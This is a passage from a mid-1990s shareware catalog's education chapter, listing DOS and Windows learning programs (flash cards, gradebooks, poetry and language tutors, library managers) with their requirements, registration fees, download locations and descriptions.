MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 477. + + Product: Teach Your Children + Author: , 201-635-1824 + Version: 2.0 (02-06-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + VBRUN300.DLL. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 51/4" master disk(s); lifetime unlimited phone, + CompuServe, mail support; bonus utilities; bonus data; all ASP- + wide offers (see page 5). Lifetime free upgrading allowed. 99 + free update disk(s) sent out. + Look for: TYC2_0.ZIP on BBSs; TYC.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 76336,3271 for + assistance). + SWREG#: 3164 + PsL#: 11793 + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Makes learning math and reading fun for you and your child with + visual and audio reinforcement. Sound card not required! + Assists with addition, subtraction, and multiplication, as well + as spelling and word recognition. Various levels for varying + abilities. Lets you record your child's progress unobtrusively + and view results via printed and/or on-screen reports. Handy + on-screen pointers guide you and your child every step of the + way. Includes on-line context sensitive help system. + + + Product: U.S. Geography Tutor + Geography testing/teaching Windows program. See full + description on page 472. + + Chapter 13, "Education" 453 + + + + Product: WinFlash + Author: , 719-531-0403 + Version: 3.0 (12-21-93) + Needs: IBM AT (80286), Windows 3.1 or better. 512k RAM; VGA + monitor; Hard disk. Any ASCII text editor. + Strongly recommended: Mouse. + Registration fee: $19.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 6 + months of CompuServe, mail support; lifetime return policy; + bonus utilities; disks of other shareware. 12-month free + upgrading allowed. + Look for: FLASH_30.ZIP on BBSs (call 703-680-9269 to download it + at no charge); FLASH.ZIP on CompuServe in CIS:WINUTIL forum + LIBrary 18 (or contact userID 75236,3243 for assistance). + Download size: 162k (about twelve minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. 1994 finalist, Shareware + Industry Awards. + Description: + Adds TrueType fonts, colors, .BMP graphics, .WAV sounds and a + new "Priority Questions From History" mode which customizes the + selection of questions to focus on those not yet learned. Easy + for children to use - no computer experience needed. Memorize + coursework or professional material fast! + + + Product: Z & Z Color + Color-by-number for ages 3 and up. See full description on + page 443. + + Product: Z & Z Puzzle + Author: , 410-561-3891 + Version: 1.0 (09-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 6 months of unlimited phone, CompuServe, mail support; + bonus data; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; ZZPUZZ.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 12 (or contact userID 76021,2256 + for assistance). + SWREG#: 7251 + PsL#: 14173 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A Windows combination slider and jigsaw puzzle for ages 4 and + above. Helps to improve problem solving skills. Contains many + options including the unique twist of having the pieces colored + + Chapter 13, "Education" 454 + + + + in only when they are in their correct locations. Prize is + awarded upon successful completion of each puzzle. + + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 481. + + + 13.3 Junior high + + Product: Card Flash + Card flash. See full description on page 455. + + Product: Crossdown for Windows + Solve and construct puzzles in Windows. See full description + on page 632. + + Product: Ecomaster + Ecology strategy game. See full description on page 478. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 629. + + Product: Mouse Math + A whimsical verbal math drill program. See full description on + page 467. + + Product: PHRASE.ZIP + Combo hangman & wheel of fortune. New concept. See full + description on page 630. + + Product: PoeTrio + Author: , 216-632-5447 + Version: 1.0 (04-07-91) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, GEnie, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 5); discounts on other products; discounts on + upgrades. 10% discount on other Chatfield Software products; + free bonus disk. + Look for: CSPT.ZIP on BBSs; CSPT.ZIP on CompuServe in CIS:IBMAPPS + forum LIBrary 0 (or contact userID 71031,1036 for assistance); + CSPT.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 131k (about ten minutes with a 2400 baud modem) + Description: + Derives its name from the fact that it is a trio of educational + poetry programs: one for free verse (CATALYST); one for + syllabics (HAIKUKU); and one for an original verseform called + + Chapter 13, "Education" 455 + + + + the CANTONA. Each of the three programs has its own verse + editor. + + + Product: Teach Your Children + Helps kids have fun learning math and reading. See full + description on page 452. + + Product: U.S. Geography Tutor + Geography testing/teaching Windows program. See full + description on page 472. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 394. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 481. + + + 13.4 High school + + Product: Bible Timeline for Windows + Interactive historical timelines. See full description on + page 592. + + Product: BTS-Equalizer + Author: , 816-582-8589 + Version: 1.9 (02-24-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives; Hard disk; Epson + printer. + Registration fee: $19.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 12-month return + policy; discounts on upgrades. 1-month free upgrading allowed. + 1 free update disk(s) sent out. + Look for: NPBT19.ZIP on BBSs; NPBT19.EXE on CompuServe in + CIS:EDFORUM forum LIBrary 2 (or contact userID 71222,3565 for + assistance). + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + Students, parents and teachers write instructional question + files for review, remediation, makeup, games, tests and + assessments. Edit, share, compete and trade the files on + paper, disk and BBS. Operate a question file exchange in your + class or school. "Beat the system" in any subject. Change + from passive pupil to self-correcting scholar. Think at + several levels. BBS sysops: run a "home school" based on + subscribers' school assignments. + + Chapter 13, "Education" 456 + + + + Product: Card Flash + Author: , 312-922-6313 + Version: 1.0 (11-21-94) + Needs: IBM 80386, Windows 3.1 or better. 1024k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor; sound card. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: lifetime unlimited phone, BBS, CompuServe, + mail support; bonus data; all ASP-wide offers (see page 5); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: CFLASH10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); CFLAS*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 15 (or contact userID 71532,3271 for assistance). + Download size: 152k (about twelve minutes with a 2400 baud modem) + Description: + A Windows flash card program that aids with learning and + memorization. Multimedia flash cards may be created and + virtually any topic may be used. On-line help. + + + Product: Crossdown + Solve, construct and print crossword puzzles. See full + description on page 632. + + Product: Crossdown for Windows + Solve and construct puzzles in Windows. See full description + on page 632. + + Product: Enigmacross + Solve and construct acrostic puzzles. See full description on + page 633. + + Product: FDplot + Function and data plot w/error-bars. See full description on + page 397. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 628. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 629. + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 590. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 359. + + Chapter 13, "Education" 457 + + + + Product: Periodic Table [***] + Electronic table of elements with decay data. See full + description on page 480. + + Product: PoeTrio + Three poetry tutorials with separate editors. See full + description on page 454. + + Product: POETRY STAR + Author: , 216-632-5447 + Version: 1.1 (03-15-92) + Needs: IBM PC, DOS 2.11 or better. 240k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Dual 720k floppy drives. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited tollfree 800# phone, fax, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. Free writers' tip-sheets; 10% + discount on other Chatfield Software products; FREE bonus disk. + Look for: CSPS.ZIP on BBSs; CSPS.ZIP on CompuServe in CIS:IBMAPPS + forum LIBrary 1 (or contact userID 71031,1036 for assistance); + CSPS.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 124k (about nine minutes with a 2400 baud modem) + Description: + A highly interactive tutor for contemporary poetry writing + which approaches the subject of poetry writing from the + perspective of discovery and delight, the way poets approach + it. Leads you step by step into a wacky, joyful new world where + verbal imagination reigns supreme. It is written in the + Artficial Intelligence language INRAC, which makes it possible + for you to communicate with the program in standard English. + + + Product: QA Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 329. + + Product: Spanish Helper Level One + Interactive program to learn Spanish. See full description on + page 471. + + Product: TRAINER + Scores tests free-choice and forced-choice. See full + description on page 463. + + Product: WinFlash + Windows flash card program. See full description on page 452. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 394. + + Chapter 13, "Education" 458 + + + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 481. + + + 13.5 College + + Product: BESTHES + Pop-up ultrafast 3,056,200-word thesaurus. See full + description on page 203. + + Product: BTS-Equalizer + Tutor and study aid, question file exchange. See full + description on page 455. + + Product: BUDDY: A Tutorial Companion + Eight-lesson AI tutorial for clearer writing. See full + description on page 212. + + Product: Card Flash + Card flash. See full description on page 455. + + Product: CHRONOS + Interactive historical timelines. See full description on + page 473. + + Product: Crossdown + Solve, construct and print crossword puzzles. See full + description on page 632. + + Product: Enigmacross + Solve and construct acrostic puzzles. See full description on + page 633. + + Product: FDplot + Function and data plot w/error-bars. See full description on + page 397. + + Product: Fictionary + The game of fantastic/farfetched definitions. See full + description on page 628. + + Product: HANG4.ZIP + 100% user configureable hangman. 256 colors! See full + description on page 629. + + Product: LEADING AND MANAGING OTHERS + A multimedia seminar on disk: leaders & mgrs. See full + description on page 329. + + Product: Lecture + Displays text-based slide show lectures. See full description + on page 330. + + Chapter 13, "Education" 459 + + + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 590. + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 359. + + Product: Periodic Table [***] + Electronic table of elements with decay data. See full + description on page 480. + + Product: PowerBatch + Batch file replacement creates compiled pgms. See full + description on page 106. + + Product: QA Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 329. + + Product: Spanish Helper Level One + Interactive program to learn Spanish. See full description on + page 471. + + Product: TRAINER + Scores tests free-choice and forced-choice. See full + description on page 463. + + Product: WinFlash + Windows flash card program. See full description on page 452. + + Product: XYSee + Mid/Hi-school visual math for Windows & DOS. See full + description on page 394. + + Product: Zpeller + Improves spelling & vocabulary skills. See full description on + page 481. + + + 13.6 Library/bibliography + + See also: Business, Specific-field systems, Library. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 207. + + Chapter 13, "Education" 460 + + + + Product: Book Librarian + Author: , 404-516-8575 + Version: 1.53 (12-26-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $34.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, CompuServe, GEnie, + mail support; discounts on other products. + Look for: BL153.ZIP on BBSs (call 703-680-9269 to download it at + no charge); BL.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 72427,1603 for assistance); BL153.ZIP on + GEnie in IBMPC forum LIBrary 15 (or contact userID L.TURNER1 + for assistance). + Download size: 223k (about 17 minutes with a 2400 baud modem) + Description: + Powerful easy-to-use menu-driven program to organize and manage + a personal, club, corporate, church or school library. Features + context sensitive help, browse and find windows. Each record + stores title, author, subject, book type, catalog # and much + more. Full featured reporting with numerous reports to the + screen, printer or disk. + + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great p. See full + description on page 538. + + Product: Public Library + Author: , 201-529-8318 + Version: 3.3 (09-05-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; 3-month + return policy; bonus utilities; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; MLRPUB.ZIP on CompuServe + in CIS:ASPCD forum LIBrary 0 (or contact userID 70761,2175 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Tired of paying overdue fines at your local library? This + reminds you of the due dates of everything you take out of your + public library. It also keeps the returned books in a + historical file that you can search, sort and print, which is a + + Chapter 13, "Education" 461 + + + + great help to high school and college kids doing research + papers. + + + Product: REFILE + Author: , 317-844-6380 + Version: 3.1 (04-17-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Dual + 720k floppy drives; Hard disk; HP LaserJet printer; Mouse; + Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + 1-month limited return policy; discounts on upgrades. + Look for: availability unknown on BBSs; REFILE.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 7 (or contact userID 73770,3076 for + assistance). + SWREG#: 1768 + Download size: 172k (about 13 minutes with a 2400 baud modem) + Description: + One component of a document management system for the filing + and retrieval of journal or periodical articles. A browse + feature for authors, sources, keywords, and document folders + simplifies data entry and searches. It assigns and manages all + document identification and will print index cards or labels. + Formatted bibliographies may be produced with a companion + product. + + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 207. + + Product: ScrollZ + For your periodicals, books, papers & comics. See full + description on page 526. + + Product: Visual Computer Dictionary Plus + Graphically portrays computer definitions. See full + description on page 465. + + + 13.7 Teachers + + Product: BTS-Equalizer + Tutor and study aid, question file exchange. See full + description on page 455. + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 197. + + Chapter 13, "Education" 462 + + + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 197. + + Product: Crossword Creator + Author: , 909-797-3091 + Version: 6.00 (04-15-94) + Needs: IBM PC, DOS 5.0 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Mouse. + Registration fee: $49.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; bonus utilities; discounts on + other products. 3-month free upgrading allowed. Word lists; + Crossword Clipper publishing utility. + Look for: CWC600.ZIP on BBSs; CWC.ZIP on CompuServe in CIS:PCNEW + forum LIBrary 8 (or contact userID 72357,3523 for assistance). + SWREG#: 95 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + A great tool for teachers and trainers, great fun for students + and trainees. This crossword puzzle "editor" provides all the + tools you need to quickly design and print your own crosswords. + Pull-down menus, mouse support, comprehensive on-line help. Can + generate freeform puzzles from a word list or ASCII file. + Works with a companion program, Crossword Clipper, to produce + .PCX and .BMP graphic files for use in word-processors or + graphics applications. Spanish, French, and German versions + available. + + + Product: LessonPlanZ + Author: , 816-429-3558 + Version: 2.60 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $31.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products. + + Chapter 13, "Education" 463 + + + + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: LPLNZ260.ZIP on BBSs (call 317-784-2147 to download it + at no charge); LPLANZ.ZIP on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70272,3317 for assistance). + SWREG#: 69 + Download size: 253k (about 19 minutes with a 2400 baud modem) + Description: + Lesson planning made easy! Has separate areas for goals, + objectives, methods, evaluations, and materials. Each area can + be from 1 to 5000 lines long! Header information holds title, + dates covered, number of days, subject and more. Default + settings for school and teacher name. Prints a variety of + reports including a basic lesson plan, separate areas, a custom + listing, and folder labels to hold your plans! Uses common WP + commands, menu driven, mousable, and on line help. + + + Product: THE MAGIC OF THE MIND + Contentious philosophy of human behavior. See full description + on page 590. + + Product: A MUSICAL TUTORIAL + An excellent way to promote musical study. See full + description on page 476. + + Product: A MUSICAL TUTORIAL for Windows + An excellent way to promote musical study. See full + description on page 477. + + Product: QA Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 329. + + Product: TRAINER + Author: , 816-582-8589 + Version: 1.4 (08-20-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $19.95 + Registration benefits: 12 months of phone, CompuServe, mail + support. 1 free update disk(s) sent out. + Look for: NPTR14.ZIP on BBSs; NPTR14.* on CompuServe in + CIS:EDFORUM forum LIBrary 1 (or contact userID 71222,3565 for + assistance). + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Trains passive pupils to become self-correcting scholars. + Scores 20-200+ tests by quality and quantity. Rewards self- + judgment and the sense of responsibility needed to learn at + higher levels of thinking. Allows students to report what they + know or can do. No need to pre-guess question difficulty. + + Chapter 13, "Education" 464 + + + + Norm- and criterion-referenced conversion of scores to grades. + Instructions and sample data are built in. + + + Product: You're Hired! + A realistic job interview simulator. See full description on + page 332. + + 13.7.1 Gradebooks + + Product: GradeBook for Windows + Author: , 517-727-2066 + Version: 3.06 (01-24-95) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; CGA + monitor; Hercules monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Mouse; Epson printer. + Registration fee: $34.00 (add $3.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; bonus utilities; bonus + templates; discounts on other products; discounts on upgrades. + Look for: GB306.ZIP on BBSs (call 317-856-2087 to download it at + no charge); GB306.EXE on CompuServe in CIS:EDFORUM forum + LIBrary 2 (or contact userID 70150,323 for assistance). + SWREG#: 685 + PsL#: 10763 + Download size: 830k (about 62 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + A Windows based teacher's gradebook with extensive online help. + Terms, tasks & grades may be customized. Allows multiple + periods per term, score transfers, curving, teacher notes, not + counted scores, user defined categories, ID#'s, tot points or + category weights, discard worst "n" scores per category, extra + credit options, multiple class score & grade distribution + statistics with charts, progress reports, imp/exp, clipbd & + font support, interim weights, attendance, Word & Excel macros, + much more. + + + 13.8 Computers + + See also: Computer programming, Tutorials; Home & hobby, + Computers; Business, Training & support aids. + + Product: Basic Training + BASIC language tutorial. See full description on page 426. + + Product: CD-ROM Guide + Directory of DOS & Windows CD-ROM Titles. See full description + on page 520. + + Chapter 13, "Education" 465 + + + + Product: Computer Dictionary + Author: , 914-357-4171 + Version: 1.20 (12-29-94) + Needs: IBM AT (80286), Windows 3.1 or better. Windows 3.1. + Strongly recommended: VGA monitor. + Registration fee: $5.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. + Look for: CDICT.ZIP on BBSs. + Download size: 255k (about 19 minutes with a 2400 baud modem) + Description: + An on-line dictionary of computer terms written for absolute + beginners and it is also a reference for everyone else. + Contains over 1001 computer terms that every computer user + should know. When placed in the Start Up Group of Windows 3.1, + it would be available for reference at any time from the CTRL + ESC task list or by using ALT TAB. + + + Product: QA Study Aid [***] + Comprehensive computer testing/grading system. See full + description on page 329. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 169. + + 13.8.1 Computer hardware tutors + + Product: Visual Computer Dictionary Plus + Author: + Version: 2.0 (05-10-95) + Needs: IBM AT (80286), DOS 3.3 or better. 450k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: XMS memory. + Registration fee: $39.00 + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of CompuServe, mail support; discounts on + upgrades. + Look for: availability unknown on BBSs. + Download size: 2800k (about 208 minutes with a 2400 baud modem) + Description: + Designed to graphically portray computer definitions in an + attractive and comprehensive way. It will appeal to anybody who + owns a computer and would like to be informed about computer + definitions, computer related terms, DOS commands, symbols and + acronyms. Developed for IBM PC and compatible computers, + program runs in a DOS environment. Defines terms on a wide + variety of topics with over 1100 definitions. + + Chapter 13, "Education" 466 + + + + 13.8.2 Operating system tutors + + Product: DOS Summary + Author: + Version: 1.01 (02-23-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $0.00 + Registration benefits: Support. + Look for: DOSSUM.ZIP on BBSs; DSUM01.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 75655,210 for + assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A DOS command summary program. When started from DOS you have + the option of accessing either an alphabetical menu of DOS + commands or a menu where commands are grouped by function. A + second way of accessing a command is by starting the program + with a command name as a parameter. Finds the closest match to + the command you entered - so exact spelling is not necessary. + Only DOS commands are in this version; batch commands and + CONFIG.SYS commands are not. DOS versions to 4.01 supported. + + + Product: DOS Summary (Hypertext) + Author: + Version: 2.0 (02-15-92) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $25.00 + Registration benefits: Printed manual with command examples not + found in the software, master disks, bonus utilities. + Shareware disks of other products. + Look for: DOSSUM20.ZIP on BBSs; DSUM02.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 75655,210 for + assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + DOS Summary is a hypertext tutorial and reference product which + covers all DOS commands and drivers through MS-DOS 5.0. Also + added are tutorials covering memory management and how DOS + starts. The program can be used in standalone or resident mode. + When started, you have the option of an alphabetical command + menu or a menu where commands are grouped by function. You may + also start the program with a DOS command name as a parameter + and be taken immediately to that command. + + + Product: TOP + Ultimate DOS command enhancement utility. See full description + on page 99. + + Chapter 13, "Education" 467 + + + + Product: TUTOR.COM + Author: + Version: 4.5 (05-01-91) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $15.00 + Registration benefits: Printed manual, master disks. + Look for: TUTCOM.ZIP on BBSs; TUTCOM.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 11 (or contact userID 75655,210 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + Description: + A minicourse in microcomputing covering the basics of a variety + of topics including: Computer History, Introduction to DOS, + Computer Terminology, Subdirectories, Hardware, Batch Files, + the Keyboard, and Introduction to Programming. Material is + presented in a series of screens and the user has the ability + to move forward or backward through the tutorials, or jump to + selected locations using a menu. Short quizzes test you on your + knowledge but you may bypass these when reviewing. + + + 13.8.3 Educational computer games + + See also: Games. + + Product: Mouse Math + Author: , 814-226-5600 + Version: 1.0 (08-15-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: SVGA monitor; sound card. + Registration fee: $20.00 (add $10.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, CompuServe, mail support; + bonus data; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 2200k (about 163 minutes with a 2400 baud modem) + Description: + A verbal mathematics drill program for Windows that gradually + uncovers whimsical photographs as answers to spoken basic math + problems are clicked with a mouse. Setup options allow you to + select problem ranges appropriate for young children, teens and + adults. + + Chapter 13, "Education" 468 + + + + Product: Personal Challenge + Author: + Version: 1.1 (10-04-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM. + Strongly recommended: Hard disk; HP LaserJet printer; Epson + printer. + Registration fee: $15.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; bonus data; discounts on upgrades. + Look for: CHALL11.ZIP on BBSs; CHALL.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10541 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Play different educational and trivia games to test your + knowledge in a variety of categories as you compete against + yourself or others. Your choice of Beginner, Intermediate or + Expert determines how fast you play and how many points you can + earn. Winners earn Honorary Degrees and a chance for fame on + the High Scorers list. + + + Product: Word Search Puzzle Maker [***] + Creates shaped printed word search puzzles. See full + description on page 635. + + Product: Z & Z Color + Color-by-number for ages 3 and up. See full description on + page 443. + + Product: Z & Z Puzzle + Windows combination jigsaw/slider puzzle. See full description + on page 453. + + + 13.9 Foreign language + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 462. + + Chapter 13, "Education" 469 + + + + Product: GAKUSEI + Author: , 310-327-4862 + Version: 1.1.3 (06-12-94) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: HP LaserJet printer; Epson printer. HP + LJII or Epson LQ with 32K. + Registration fee: $55.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited + tollfree 800# phone, CompuServe, mail support; bonus data; + discounts on upgrades. + Look for: availability unknown on BBSs; GAK11*.EXE on CompuServe + in CIS:FLEFO forum LIBrary 7 (multiple files) (or contact + userID 70700,2225 for assistance); GAK*.* on GEnie in EDUCATION + forum LIBrary 0 (multiple files). + PsL#: 11283 + Download size: 1500k (about 112 minutes with a 2400 baud modem) + Description: + An elementary Japanese grammar tutorial. Lessons include: an + introduction to kana; onomatopoeia; DESU copula; ARIMASU/IMASU + verbs of existence; WA, GA, E, O, DE, and NI relationals; + dictionary and -MASU verb forms; NA adjectives; and more. + + + Product: Hebrew Edit + Hebrew text editor with vowels. See full description on + page 194. + + Product: KAPIAN : Chinese Flash Cards + Author: , 916-927-2602 + Version: 1.1 (02-02-92) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; CGA monitor. + Registration fee: $35.00 (add $4.00 for shipping to U.S. + addresses) (add $11.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 51/4" master disk(s); + lifetime unlimited phone, newsletter, mail support; all ASP- + wide offers (see page 5). + Look for: availability unknown on BBSs; KAPIAN.ZIP on CompuServe + in CIS:FLEFO forum LIBrary 7 (or contact userID 70724,2276 for + assistance); KAPIAN.ZIP on GEnie in QMODEM forum LIBrary 1. + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Multiple choice test of Chinese that runs in 10 modes: + v/ 1-2 given long or short form characters select + romanization + v/ 3-4 Given long or short form characters select English + v/ 5-6-7 Given English select long or short form characters + or romanization + v/ 8-9-10 Given romanization slection long or short form + characters or English + + Chapter 13, "Education" 470 + + + + Utilities are encluded to make characters and lessons. + Characters are drawn on screen by stroke order. + + + Product: LinguaPro/SPANISH + Author: , 713-440-4444 + Version: 2.50 (09-06-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 5); discounts on other products. Bonus + courses; bonus vocabulary; complete verb reference. + Look for: availability unknown on BBSs; LPROSP.EXE on CompuServe + in CIS:FLEFO forum LIBrary 1 (or contact userID 72650,3160 for + assistance); LPRSP250.EXE on GEnie in EDUCATION forum LIBrary 2 + (or contact userID C.SCHULENBER for assistance). + PsL#: 10875 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Implements Units 1-18 of the FSI Basic Spanish Course + (including grammar tutorials), Units 1-12 consist of a + conversational course in the Castilian dialect, a 19,000-word + user-modifiable online dictionary, a flashcarding system for + mastery of this graded 5-level vocabulary, a unique verb + conjugation system that drills verbs in all tenses/persons + using millions of complete sentences, and a verb reference with + definitions and conjugations of over 9200 verbs, including + idiomatic usages. + + + Product: 